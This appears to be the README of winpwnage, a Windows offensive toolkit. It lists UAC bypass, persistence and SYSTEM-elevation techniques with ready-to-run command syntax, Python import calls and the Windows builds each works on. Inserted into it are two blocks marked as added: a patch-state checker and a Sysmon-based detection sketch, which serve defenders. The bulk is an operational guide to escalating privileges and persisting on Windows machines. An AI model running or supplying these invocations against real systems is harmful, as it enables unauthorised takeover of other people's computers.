
winpwnage's Introduction



Disclaimer

This tool is provided for educational and research purposes only. The authors of this project are in no way responsible for any misuse of this tool.

Building

This build works on Python >= 3.6 and puts the .exe file into the dist directory. Install pyinstaller with pip:

pip install pyinstaller

And run the following command:

pyinstaller --onefile main.py

Scanning

Compares the running Windows build number against each technique's 'Works from' and 'Fixed in' build numbers and displays which entries are still compatible.

main.py --scan uac
main.py --scan persist
main.py --scan elevate

Example results when scanning for possible UAC methods

 Id:    Type:           Compatible:     Description:
 ----   ------          -----------     -------------
 1      UAC bypass      No              UAC bypass using runas
 2      UAC bypass      Yes             UAC bypass using fodhelper.exe
 3      UAC bypass      Yes             UAC bypass using slui.exe
 4      UAC bypass      Yes             UAC bypass using silentcleanup scheduled task
 5      UAC bypass      No              UAC bypass using sdclt.exe (isolatedcommand)
 6      UAC bypass      No              UAC bypass using sdclt.exe (App Paths)
 7      UAC bypass      No              UAC bypass using perfmon.exe

Importing

Bypass UAC using uacMethod2

from winpwnage.functions.uac.uacMethod2 import uacMethod2
uacMethod2(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"])

Persist on system using persistMethod4

from winpwnage.functions.persist.persistMethod4 import persistMethod4
persistMethod4(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"], add=True)

# Removal
persistMethod4(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"], add=False)

Elevate from administrator to SYSTEM using elevateMethod1

from winpwnage.functions.elevate.elevateMethod1 import elevateMethod1
elevateMethod1(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"])

UAC bypass techniques

  • UAC bypass using runas
    • Id: 1
    • Method: Windows API; this only works if UAC is set to never notify
    • Syntax: main.py --use uac --id 1 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 7600
    • Fixed in: n/a
  • UAC bypass using fodhelper.exe
    • Id: 2
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 2 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 10240
    • Fixed in: n/a
  • UAC bypass using slui.exe
    • Id: 3
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 3 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 9600
    • Fixed in: n/a
  • UAC bypass using silentcleanup scheduled task
    • Id: 4
    • Method: Registry key (Environment) manipulation; this bypasses UAC's Always Notify level
    • Syntax: main.py --use uac --id 4 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 9600
    • Fixed in: n/a
  • UAC bypass using sdclt.exe (isolatedcommand)
    • Id: 5
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 5 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 10240
    • Fixed in: 17025
  • UAC bypass using sdclt.exe (App Paths)
    • Id: 6
    • Method: Registry key (App Paths) manipulation
    • Syntax: main.py --use uac --id 6 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 10240
    • Fixed in: 16215
  • UAC bypass using perfmon.exe
    • Id: 7
    • Method: Registry key (Volatile Environment) manipulation
    • Syntax: main.py --use uac --id 7 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 7600
    • Fixed in: 16299
  • UAC bypass using eventvwr.exe
    • Id: 8
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 8 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 7600
    • Fixed in: 15031
  • UAC bypass using compmgmtlauncher.exe
    • Id: 9
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 9 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 7600
    • Fixed in: 15031
  • UAC bypass using computerdefaults.exe
    • Id: 10
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 10 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 10240
    • Fixed in: n/a
  • UAC bypass using token manipulation
    • Id: 11
    • Method: Token manipulation
    • Syntax: main.py --use uac --id 11 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 7600
    • Fixed in: 17686
  • UAC bypass using sdclt.exe (Folder)
    • Id: 12
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 12 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 14393
    • Fixed in: n/a
  • UAC bypass using cmstp.exe
    • Id: 13
    • Method: Malicious ini file
    • Syntax: main.py --use uac --id 13 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 7600
    • Fixed in: n/a
  • UAC bypass using wsreset.exe
    • Id: 14
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 14 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 17134
    • Fixed in: n/a
  • UAC bypass using slui.exe and changepk.exe
    • Id: 15
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 15 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 17763
    • Fixed in: n/a
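The 'Scanning' section above only says that the tool compares the build number against the 'Fixed in' values. The following is an added example, not winpwnage's own code, that makes that comparison explicit over a copy of the UAC list transcribed from this page, so a defender can tell which catalogue entries a given Windows build still leaves open. It assumes the boundary is 'works on builds from Works from up to but not including Fixed in' (the page does not state whether 'Fixed in' is inclusive), and it reports Id 1 as 'Depends' rather than 'No' because that entry hinges on the UAC notification level, which a build comparison alone cannot decide. The `Technique` class, `status`, `unpatched_ids`, `render` and `current_build` are names of this example only.

```python
"""Build-number patch-state check for the UAC bypass list above.

Added example, not winpwnage's own code. Reproduces the comparison the
'Scanning' section describes (running build vs. each entry's 'Works from'
and 'Fixed in' build) over a copy of the UAC list transcribed from the page.
The build is passed in explicitly; current_build() is a convenience that only
returns a value on Windows.
"""
import sys
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Technique:
    id: int
    name: str
    works_from: int           # first build the entry is reported to work on
    fixed_in: Optional[int]   # build that closed it; None stands for 'n/a'
    precondition: str = ""    # non-build requirement noted on the page, if any


# Transcribed from the 'UAC bypass techniques' list above.
UAC_TECHNIQUES: List[Technique] = [
    Technique(1, "runas", 7600, None, "UAC set to never notify"),
    Technique(2, "fodhelper.exe", 10240, None),
    Technique(3, "slui.exe", 9600, None),
    Technique(4, "silentcleanup scheduled task", 9600, None),
    Technique(5, "sdclt.exe (isolatedcommand)", 10240, 17025),
    Technique(6, "sdclt.exe (App Paths)", 10240, 16215),
    Technique(7, "perfmon.exe", 7600, 16299),
    Technique(8, "eventvwr.exe", 7600, 15031),
    Technique(9, "compmgmtlauncher.exe", 7600, 15031),
    Technique(10, "computerdefaults.exe", 10240, None),
    Technique(11, "token manipulation", 7600, 17686),
    Technique(12, "sdclt.exe (Folder)", 14393, None),
    Technique(13, "cmstp.exe", 7600, None),
    Technique(14, "wsreset.exe", 17134, None),
    Technique(15, "slui.exe and changepk.exe", 17763, None),
]


def status(t: Technique, build: int) -> str:
    """'Yes' if build is in [works_from, fixed_in), 'No' if outside it,
    'Depends' if the build fits but the page lists a non-build precondition."""
    if build < t.works_from:
        return "No"
    if t.fixed_in is not None and build >= t.fixed_in:
        return "No"
    return "Depends" if t.precondition else "Yes"


def unpatched_ids(techniques: List[Technique], build: int) -> List[int]:
    """Ids whose window is still open on this build ('Depends' entries excluded)."""
    return [t.id for t in techniques if status(t, build) == "Yes"]


def render(techniques: List[Technique], build: int) -> str:
    """Table in the same layout as the 'Example results' shown above."""
    rows = [f" {'Id:':<6} {'Type:':<15} {'Compatible:':<15} Description:",
            f" {'----':<6} {'------':<15} {'-----------':<15} -------------"]
    for t in techniques:
        note = f" ({t.precondition})" if t.precondition else ""
        rows.append(f" {t.id:<6} {'UAC bypass':<15} {status(t, build):<15} "
                    f"UAC bypass using {t.name}{note}")
    return "\n".join(rows)


def current_build() -> Optional[int]:
    """Running Windows build number, or None on other platforms."""
    version = getattr(sys, "getwindowsversion", None)
    return version().build if version else None


if __name__ == "__main__":
    # Off Windows, fall back to a build number that appears on the page.
    build = current_build() or 17134
    print(render(UAC_TECHNIQUES, build))
```

Run it on a patched and an unpatched build side by side and the open window for each entry is visible at a glance; the same table shape can be filled from the persistence and elevation lists, which carry 'Works from' and 'Fixed in' values in the same format.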

Persistence techniques

  • Persistence using mofcomp.exe (SYSTEM privileges)
    • Id: 1
    • Method: Malicious mof file using EventFilter EventConsumer and binding
    • Syntax: main.py --use persist --id 1 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 1 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using schtasks.exe (SYSTEM privileges)
    • Id: 2
    • Method: Malicious scheduled task
    • Syntax: main.py --use persist --id 2 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 2 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using image file execution option and magnifier.exe
    • Id: 3
    • Method: Image File Execution Options debugger and accessibility application
    • Syntax: main.py --use persist --id 3 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 3 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using userinit key
    • Id: 4
    • Method: Registry key (UserInit) manipulation
    • Syntax: main.py --use persist --id 4 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 4 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using HKCU run key
    • Id: 5
    • Method: Registry key (HKCU Run) manipulation
    • Syntax: main.py --use persist --id 5 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 5 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: n/a
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using HKLM run key
    • Id: 6
    • Method: Registry key (HKLM Run) manipulation
    • Syntax: main.py --use persist --id 6 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 6 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using wmic.exe (SYSTEM privileges)
    • Id: 7
    • Method: Malicious mof file using EventFilter EventConsumer and binding
    • Syntax: main.py --use persist --id 7 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 7 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using startup files
    • Id: 8
    • Method: Malicious lnk file in startup directory
    • Syntax: main.py --use persist --id 8 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 8 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: n/a
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using cortana windows app
    • Id: 9
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use persist --id 9 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 9 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: n/a
    • Works from: 14393
    • Fixed in: n/a
  • Persistence using people windows app
    • Id: 10
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use persist --id 10 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 10 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: n/a
    • Works from: 14393
    • Fixed in: n/a
  • Persistence using bitsadmin.exe
    • Id: 11
    • Method: Malicious bitsadmin job
    • Syntax: main.py --use persist --id 11 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 11 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using Windows Service (SYSTEM privileges)
    • Id: 12
    • Method: Malicious Windows Service
    • Syntax: main.py --use persist --id 12 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 12 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a

Elevation techniques

  • Elevate from administrator to NT AUTHORITY SYSTEM using handle inheritance
    • Id: 1
    • Method: Handle inheritance
    • Syntax: main.py --use elevate --id 1 --payload c:\\windows\\system32\\cmd.exe
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Elevate from administrator to NT AUTHORITY SYSTEM using token impersonation
    • Id: 2
    • Method: Token impersonation
    • Syntax: main.py --use elevate --id 2 --payload c:\\windows\\system32\\cmd.exe
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Elevate from administrator to NT AUTHORITY SYSTEM using named pipe impersonation
    • Id: 3
    • Method: Named pipe impersonation
    • Syntax: main.py --use elevate --id 3 --payload c:\\windows\\system32\\cmd.exe
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Elevate from administrator to NT AUTHORITY SYSTEM using schtasks.exe (non interactive)
    • Id: 4
    • Method: Malicious scheduled task that gets deleted once used
    • Syntax: main.py --use elevate --id 4 --payload c:\\windows\\system32\\cmd.exe
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Elevate from administrator to NT AUTHORITY SYSTEM using wmic.exe (non interactive)
    • Id: 5
    • Method: Malicious mof file using EventFilter EventConsumer and binding that gets deleted once used
    • Syntax: main.py --use elevate --id 5 --payload c:\\windows\\system32\\cmd.exe
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Elevate from administrator to NT AUTHORITY SYSTEM using Windows Service (non interactive)
    • Id: 6
    • Method: Malicious Windows Service that gets deleted once used
    • Syntax: main.py --use elevate --id 6 --payload c:\\windows\\system32\\cmd.exe
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Elevate from administrator to NT AUTHORITY SYSTEM using mofcomp.exe (non interactive)
    • Id: 7
    • Method: Malicious mof file using EventFilter EventConsumer and binding that gets deleted once used
    • Syntax: main.py --use elevate --id 7 --payload c:\\windows\\system32\\cmd.exe
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
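The persistence and elevation lists above describe their entries by the primitive they use (scheduled task, service, WMI event filter/consumer/binding, Run or Userinit key, IFEO debugger, Startup shortcut). From a monitoring point of view each of those primitives has a well-known log source, and the following added example, which is not part of winpwnage, maps Windows Security, System and Sysmon events to the technique ids in both lists so a defender can see which telemetry covers which entry. The event ids (Security 4698, System 7045, Sysmon 11, 12, 13, 19, 20, 21) and the registry paths are real; the record format is a plain dict of this example's own choosing, and the sample records are constructed, not captured telemetry. `classify`, `detect`, `REGISTRY_RULES` and `SAMPLE_EVENTS` are names of this example only.

```python
"""Detection sketch for the persistence and elevation primitives listed above.

Added example, not part of winpwnage. Maps Windows Security/System and Sysmon
events (real event ids; constructed sample records) to the technique ids in
the lists above. Field names follow the Sysmon / Security event schema, but
the dict layout is this example's own.
"""
import re
from typing import Dict, List, Optional, Tuple

Event = Dict[str, object]
Finding = Tuple[str, str]  # (technique ids from the lists above, reason)

# Registry locations the registry-based entries modify. Sysmon reports user
# hives as HKU\<SID>\... and the machine hive as HKLM\...
REGISTRY_RULES = [
    (re.compile(r"^hku\\.*\\microsoft\\windows\\currentversion\\run\\", re.I),
     "persist 5", "value set under a user's Run key"),
    (re.compile(r"^hklm\\.*\\microsoft\\windows\\currentversion\\run\\", re.I),
     "persist 6", "value set under the machine Run key"),
    (re.compile(r"\\winlogon\\userinit$", re.I),
     "persist 4", "Winlogon Userinit value changed"),
    (re.compile(r"\\image file execution options\\[^\\]+\\debugger$", re.I),
     "persist 3", "IFEO Debugger value set"),
]
STARTUP_LNK = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.I)


def classify(event: Event) -> Optional[Finding]:
    """Return the catalogue entry an event is evidence for, or None."""
    channel, eid = event.get("channel"), event.get("event_id")
    if channel == "Security" and eid == 4698:           # scheduled task created
        return ("persist 2, elevate 4",
                f"scheduled task created: {event.get('TaskName')}")
    if channel == "System" and eid == 7045:             # new service installed
        return ("persist 12, elevate 6",
                f"service installed: {event.get('ServiceName')} -> {event.get('ImagePath')}")
    if channel == "Sysmon":
        if eid in (12, 13):                              # registry object / value set
            target = str(event.get("TargetObject", ""))
            for pattern, ids, reason in REGISTRY_RULES:
                if pattern.search(target):
                    return (ids, f"{reason}: {target}")
        if eid in (19, 20, 21):                          # WMI filter / consumer / binding
            return ("persist 1/7, elevate 5/7",
                    "WMI event subscription component registered")
        if eid == 11:                                    # file created
            path = str(event.get("TargetFilename", ""))
            if STARTUP_LNK.search(path):
                return ("persist 8", f"shortcut dropped in Startup folder: {path}")
    return None


def detect(events: List[Event]) -> List[Finding]:
    """Run classify() over a stream of events and keep the hits, in order."""
    return [f for f in (classify(e) for e in events) if f is not None]


# Constructed sample records (not real telemetry); the last one is benign.
SAMPLE_EVENTS: List[Event] = [
    {"channel": "Security", "event_id": 4698, "TaskName": "\\Updater",
     "SubjectUserName": "alice"},
    {"channel": "System", "event_id": 7045, "ServiceName": "SyncSvc",
     "ImagePath": "C:\\Users\\Public\\sync.exe"},
    {"channel": "Sysmon", "event_id": 13,
     "TargetObject": "HKU\\S-1-5-21-1-2-3-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Helper",
     "Details": "C:\\Users\\alice\\helper.exe"},
    {"channel": "Sysmon", "event_id": 13,
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit",
     "Details": "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Public\\x.exe"},
    {"channel": "Sysmon", "event_id": 13,
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\example.exe\\Debugger",
     "Details": "C:\\Users\\Public\\d.exe"},
    {"channel": "Sysmon", "event_id": 21,
     "Consumer": "CommandLineEventConsumer.Name=\"c\"", "Filter": "__EventFilter.Name=\"f\""},
    {"channel": "Sysmon", "event_id": 11,
     "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\run.lnk"},
    {"channel": "Sysmon", "event_id": 13,
     "TargetObject": "HKLM\\SOFTWARE\\Vendor\\Settings\\Theme", "Details": "dark"},
]

if __name__ == "__main__":
    for ids, reason in detect(SAMPLE_EVENTS):
        print(f"[{ids}] {reason}")
```

Two points worth noting when adapting this: Security 4698 is only written when audit policy for "Other Object Access Events" is enabled, and the registry rules depend on Sysmon's RegistryEvent configuration actually covering those paths, so a silent log source should be treated as a coverage gap rather than as absence of activity. The entries that the lists mark with (SYSTEM privileges) or (non interactive) share the same primitives and therefore the same events, which is why several findings name both a persist and an elevate id.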


Contributors

alessandroz, byehack, cclauss, coreb1t, rootm0s
